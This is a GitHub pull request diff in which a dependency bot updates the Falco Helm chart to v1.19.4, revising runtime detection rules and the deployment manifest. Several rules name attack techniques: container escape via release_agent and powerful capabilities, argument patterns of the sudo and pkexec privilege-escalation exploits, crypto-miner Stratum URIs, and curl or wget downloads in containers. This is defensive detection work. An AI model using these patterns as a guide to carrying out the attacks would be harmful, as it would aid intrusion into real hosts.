       tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
 
+    # These capabilities were used in the past to escape from containers
+    - macro: excessively_capable_container
+      condition: >
+        (thread.cap_permitted contains CAP_SYS_ADMIN
+        or thread.cap_permitted contains CAP_SYS_MODULE
+        or thread.cap_permitted contains CAP_SYS_RAWIO
+        or thread.cap_permitted contains CAP_SYS_PTRACE
+        or thread.cap_permitted contains CAP_SYS_BOOT
+        or thread.cap_permitted contains CAP_SYSLOG
+        or thread.cap_permitted contains CAP_DAC_READ_SEARCH
+        or thread.cap_permitted contains CAP_NET_ADMIN
+        or thread.cap_permitted contains CAP_BPF)
+
+    - rule: Launch Excessively Capable Container
+      desc: Detect container started with a powerful set of capabilities. Exceptions are made for known trusted images.
+      condition: >
+        container_started and container
+        and excessively_capable_container
+        and not falco_privileged_containers
+        and not user_privileged_containers
+      output: Excessively capable container started (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag cap_permitted=%thread.cap_permitted)
+      priority: INFO
+      tags: [container, cis, mitre_privilege_escalation, mitre_lateral_movement]
+
+
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2415,7 +2882,8 @@
         '"sh -c  -t -i"',
         '"sh -c openssl version"',
         '"bash -c id -Gn kafadmin"',
-        '"sh -c /bin/sh -c ''date +%%s''"'
+        '"sh -c /bin/sh -c ''date +%%s''"',
+        '"sh -c /usr/share/lighttpd/create-mime.conf.pl"'
         ]
 
     # This list allows for easy additions to the set of commands allowed
@@ -2574,7 +3042,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
                   (user.name=_apt and evt.arg.uid=_apt) or
@@ -2612,7 +3080,7 @@
         evt.type=setuid and evt.dir=>
         and (known_user_in_container or not container)
         and not (user.name=root or user.uid=0)
-        and not somebody_becoming_themself
+        and not somebody_becoming_themselves
         and not proc.name in (known_setuid_binaries, userexec_binaries, mail_binaries, docker_binaries,
                               nomachine_binaries)
         and not proc.name startswith "runc:"
@@ -2636,7 +3104,7 @@
         activity by any programs that can manage users, passwords, or permissions. sudo and su are excluded.
         Activity in containers is also excluded--some containers create custom users on top
         of a base linux distribution at startup.
-        Some innocuous commandlines that don't actually change anything are excluded.
+        Some innocuous command lines that don't actually change anything are excluded.
       condition: >
         spawned_process and proc.name in (user_mgmt_binaries) and
         not proc.name in (su, sudo, lastlog, nologin, unix_chkpwd) and not container and
@@ -2672,7 +3140,7 @@
       desc: creating any files below /dev other than known programs that manage devices. Some rootkits hide files in /dev.
       condition: >
         fd.directory = /dev and
-        (evt.type = creat or ((evt.type = open or evt.type = openat) and evt.arg.flags contains O_CREAT))
+        (evt.type = creat or (evt.type in (open,openat,openat2) and evt.arg.flags contains O_CREAT))
         and not proc.name in (dev_creation_binaries)
         and not fd.name in (allowed_dev_files)
         and not fd.name startswith /dev/tty
@@ -2686,7 +3154,7 @@
     # explicitly enumerate the container images that you want to allow
     # access to EC2 metadata. In this main falco rules file, there isn't
     # any way to know all the containers that should have access, so any
-    # container is alllowed, by repeating the "container" macro. In the
+    # container is allowed, by repeating the "container" macro. In the
     # overridden macro, the condition would look something like
     # (container.image.repository = vendor/container-1 or
     # container.image.repository = vendor/container-2 or ...)
@@ -2740,7 +3208,8 @@
          docker.io/sysdig/sysdig, docker.io/falcosecurity/falco,
          sysdig/sysdig, falcosecurity/falco,
          fluent/fluentd-kubernetes-daemonset, prom/prometheus,
-         ibm_cloud_containers)
+         ibm_cloud_containers,
+         public.ecr.aws/falcosecurity/falco)
          or (k8s.ns.name = "kube-system"))
 
     - macro: k8s_api_server
@@ -2944,27 +3413,29 @@
         WARNING
       tags: [process, mitre_persistence]
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: modify_shell_history
       condition: >
         (modify and (
-          evt.arg.name contains "bash_history" or
-          evt.arg.name contains "zsh_history" or
+          evt.arg.name endswith "ash_history" or
+          evt.arg.name endswith "zsh_history" or
           evt.arg.name contains "fish_read_history" or
           evt.arg.name endswith "fish_history" or
-          evt.arg.oldpath contains "bash_history" or
-          evt.arg.oldpath contains "zsh_history" or
+          evt.arg.oldpath endswith "ash_history" or
+          evt.arg.oldpath endswith "zsh_history" or
           evt.arg.oldpath contains "fish_read_history" or
           evt.arg.oldpath endswith "fish_history" or
-          evt.arg.path contains "bash_history" or
-          evt.arg.path contains "zsh_history" or
+          evt.arg.path endswith "ash_history" or
+          evt.arg.path endswith "zsh_history" or
           evt.arg.path contains "fish_read_history" or
           evt.arg.path endswith "fish_history"))
 
+    # here `ash_history` will match both `bash_history` and `ash_history`
     - macro: truncate_shell_history
       condition: >
         (open_write and (
-          fd.name contains "bash_history" or
-          fd.name contains "zsh_history" or
+          fd.name endswith "ash_history" or
+          fd.name endswith "zsh_history" or
           fd.name contains "fish_read_history" or
           fd.name endswith "fish_history") and evt.arg.flags contains "O_TRUNC")
 
@@ -3003,7 +3474,7 @@
       items: [hyperkube, kubelet, k3s-agent]
 
     # This macro should be overridden in user rules as needed. This is useful if a given application
-    # should not be ignored alltogether with the user_known_chmod_applications list, but only in
+    # should not be ignored altogether with the user_known_chmod_applications list, but only in
     # specific conditions.
     - macro: user_known_set_setuid_or_setgid_bit_conditions
       condition: (never_true)
@@ -3082,8 +3553,18 @@
         create_symlink and
         (evt.arg.target in (sensitive_file_names) or evt.arg.target in (sensitive_directory_names))
       output: >
-        Symlinks created over senstivie files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
-      priority: NOTICE
+        Symlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.target linkpath=%evt.arg.linkpath parent_process=%proc.pname)
+      priority: WARNING
+      tags: [file, mitre_exfiltration]
+
+    - rule: Create Hardlink Over Sensitive Files
+      desc: Detect hardlink created over sensitive files
+      condition: >
+        create_hardlink and
+        (evt.arg.oldpath in (sensitive_file_names))
+      output: >
+        Hardlinks created over sensitive files (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline target=%evt.arg.oldpath linkpath=%evt.arg.newpath parent_process=%proc.pname)
+      priority: WARNING
       tags: [file, mitre_exfiltration]
 
     - list: miner_ports
@@ -3176,11 +3657,10 @@
       condition: (fd.sport in (miner_ports) and fd.sip.name in (miner_domains))
 
     - macro: net_miner_pool
-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify conditions under which a
+    # Custom condition for use of ingress remote file copy tool in container
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    -  macro: curl_download
+       condition: proc.name = curl and
+                  (proc.cmdline contains " -o " or
+                  proc.cmdline contains " --output " or
+                  proc.cmdline contains " -O " or
+                  proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detect an attempt to exploit a container escape using release_agent file. By running a container with certains capabilities, a privileged user can modify release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
+    -
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule:  K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get the secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
     # cluster creation. This may signify a permission setting too broader.
     # As we can't check for role of the user on a general ka.* event, this
     # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 18b080595aa175135b555cb1694e2c4125eefb719f084ee981367b4eaf5cb20a
+        checksum/rules: 68356f67ecfaa369afd632bc6e442df32656d44cb6933e0d8ecbbf15db132879
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.4 chore(deps): update Helm release falco to v1.19.4 Jun 27, 2022
@renovate renovate bot changed the title chore(deps): update Helm release falco to v1.19.4 chore(deps): update helm release falco to v1.19.4 Jun 28, 2022
@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.4 chore(deps): update helm release falco to v1.19.4 - autoclosed Mar 25, 2023
@renovate renovate bot deleted the renovate/falco-1.x branch March 25, 2023 15:58
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant